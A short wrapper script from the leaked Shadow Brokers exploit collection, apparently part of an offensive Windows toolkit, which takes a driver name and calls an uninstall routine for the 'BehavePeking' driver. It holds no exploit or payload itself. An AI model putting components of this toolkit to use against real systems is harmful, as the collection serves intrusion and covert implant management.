shadowbrokers-exploits/windows/Resources/Ep/Scripts/BehavePeking/UninstallDriver.eps
2017-04-14 11:45:07 +02:00

20 lines
No EOL
448 B
PostScript

#--------------------------------------------------------
# File: UninstallDriver.eps
#
# Wrapper script for Uninstall of BehavePeking driver
#
# Modifications:
# 29 Aug 2005 Created.
#--------------------------------------------------------
@include "_DriverIncludes.epm";
@echo off;
if ($argc != 2) {
echo "Usage: $argv[0] <driverName>";
return false;
}
string $driver = $argv[1];
return _DriverUninstall($driver);